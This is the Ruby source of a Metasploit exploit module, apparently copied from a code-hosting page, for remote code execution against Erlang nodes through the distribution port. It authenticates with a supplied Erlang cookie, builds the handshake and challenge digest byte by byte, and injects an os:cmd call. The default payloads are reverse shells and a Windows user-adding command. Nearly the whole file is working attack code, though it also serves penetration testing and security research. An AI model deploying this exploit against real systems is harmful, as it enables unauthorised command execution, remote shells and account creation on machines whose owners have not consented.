Path: blob/master/modules/exploits/multi/misc/erlang_cookie_rce.rb
24634 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GreatRanking78include Msf::Exploit::Remote::Tcp9include Msf::Exploit::CmdStager1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'Erlang Port Mapper Daemon Cookie RCE',16'Description' => %q{17The erlang port mapper daemon is used to coordinate distributed erlang instances.18Should an attacker get the authentication cookie RCE is trivial. Usually, this19cookie is named ".erlang.cookie" and varies on location.20},21'Author' => [22'Daniel Mende', # blog post article23'Milton Valencia (wetw0rk)', # metasploit module24],25'References' => [26['CVE', '2020-24719'],27['URL', 'https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/']28],29'License' => MSF_LICENSE,30'Privileged' => 'false',31'Targets' => [32[33'Unix',34'Platform' => 'unix',35'Arch' => ARCH_CMD,36'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse' },37],38[39'Linux (CmdStager)',40'Type' => :cmdstager,41'Platform' => 'linux',42'Arch' => [ARCH_X64, ARCH_X86],43'CmdStagerFlavor' => ['printf', 'echo', 'bourne']44],45[46'Windows',47'Platform' => 'win',48'Arch' => ARCH_CMD,49'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/adduser' },50],51[52'Windows (CmdStager)',53'Type' => :cmdstager,54'Platform' => 'win',55'Arch' => [ARCH_X64, ARCH_X86],56'CmdStagerFlavor' => ['certutil', 'vbs'],57'DefaultOptions' => { 'PAYLOAD' => 'windows/shell/reverse_tcp' }58]59],60'DefaultTarget' => 0,61'DisclosureDate' => '2009-11-20',62'Notes' => {63'Reliability' => UNKNOWN_RELIABILITY,64'Stability' => UNKNOWN_STABILITY,65'SideEffects' => UNKNOWN_SIDE_EFFECTS66} # https://github.com/erlang/otp/blob/master/lib/kernel/src/os.erl (history)67)68)6970register_options(71[72OptString.new('COOKIE', [ true, 'Erlang cookie to login with']),73Opt::RPORT(25672)74]75)76end7778def generate_challenge_digest(challenge)79challenge = challenge.unpack('H*')[0].to_i(16).to_s8081hash = Digest::MD5.new82hash.update(datastore['COOKIE'])83hash.update(challenge)8485vprint_status("MD5 digest generated: #{hash.hexdigest}")86return [hash.hexdigest].pack('H*')87end8889def execute_command(cmd, opts = {})90# SEND: send the message to the node91send = "\x00\x00\x00" # Length:0x0000000092send << [(0x50 + cmd.length + @our_node.length * 2).to_s(16)].pack('H*')93send << "\x70" #94send << "\x83" # VERSION_MAGIC95send << "\x68" # SMALL_TUPLE_EXT (104)96send << "\x04" # Arity: 497send << "\x61" # SMALL_INTEGER_EXT98send << "\x06" # Int: 699send << "\x67" # PID_EXT (103)100send << "\x64\x00" # Node:101send << [(@our_node.length).to_s(16)].pack('H*') # Length: strlen(Node)102send << "#{@our_node}" # Node103send << "\x00\x00\x00\x03" # ID104send << "\x00\x00\x00\x00" # Serial105send << "\x00" # Creation106send << "\x64" # InternalSegmentIndex107send << "\x00\x00" # Len: 0x0000108send << "\x64" # InternalSegmentIndex109send << "\x00\x03" # Length: 3110send << "rex" # AtomText: rex111send << "\x83\x68\x02\x67\x64\x00" #112send << [(@our_node.length).to_s(16)].pack('H*') # Length: strlen(Node)113send << "#{@our_node}" # Node114send << "\x00\x00\x00\x03" # ID115send << "\x00\x00\x00\x00" # Serial116send << "\x00" # Creation117send << "\x68" # SMALL_TUPLE_EXT (104)118send << "\x05" # Arity: 5119send << "\x64" # InternalSegmentIndex120send << "\x00\x04" # Length: 4121send << "call" # AtomText: call122send << "\x64" # InternalSegmentIndex123send << "\x00\x02" # Length: 2124send << "os" # AtomText: os125send << "\x64" # InternalSegmentIndex126send << "\x00\x03" # Length: 3127send << "cmd" # AtomText: cmd128send << "\x6c" # LIST_EXT129send << "\x00\x00\x00\x01" # Length: 1130send << "\x6b" # Elements: k131send << "\x00" # Tail132send << [(cmd.length).to_s(16)].pack('H*') # strlen(Command)133send << cmd134send << "\x6a" # NIL_EXT135send << "\x64" # InternalSegmentIndex136send << "\x00\x04" # Length: 4137send << "user" # AtomText: user138sock.put(send)139end140141def exploit142connect143144@our_node = "#{rand_text_alphanumeric(6..12)}@#{rand_text_alphanumeric(6..12)}"145146# SEND_NAME: send initial identification of who "we" are147send_name = "\x00" # Length: 0x0000148send_name << [(@our_node.length + 7).to_s(16)].pack('H*')149send_name << "\x6e" # Tag: n150send_name << "\x00\x05" # Version: R6 (5)151send_name << "\x00\x07\x49\x9c" # Flags (0x0007499c)152# DFLAG_EXTENDED_REFERENCES (0x4)153# DFLAG_DIST_MONITOR (0x8)154# DFLAG_FUN_TAGS (0x10)155# DFLAG_NEW_FUN_TAGS (0x80)156# DFLAG_EXTENDED_PIDS_PORTS (0x100)157# DFLAG_NEW_FLOATS (0x800)158# DFLAG_SMALL_ATOM_TAGS (0x4000)159# DFLAG_UTF8_ATOMS (0x10000)160# DFLAG_MAP_TAG (0x20000)161# DFLAG_BIG_CREATION (0x40000)162send_name << "#{@our_node}" # <generated>@<generated>163164# SEND_CHALLENGE_REPLY: return generated digest and its own challenge165send_challenge_reply = "\x00\x15" # Length: 21166send_challenge_reply << "\x72" # Tag: r167168sock.put(send_name)169170# receive servers "SEND_CHALLENGE" token (4 bytes)171print_status("Receiving server challenge")172challenge = sock.get173challenge = challenge[14, 4]174175send_challenge_reply << challenge176send_challenge_reply << generate_challenge_digest(challenge)177178print_status("Sending challenge reply")179sock.put(send_challenge_reply)180181if sock.get.length < 1182fail_with(Failure::UnexpectedReply, "Authentication Failed:#{datastore['COOKIE']}")183end184185print_good("Authentication successful, sending payload")186187print_status('Exploiting...')188if target['Type'] == :cmdstager189execute_cmdstager(:linemax => 100)190else191execute_command(payload.raw)192end193disconnect194end195end196197198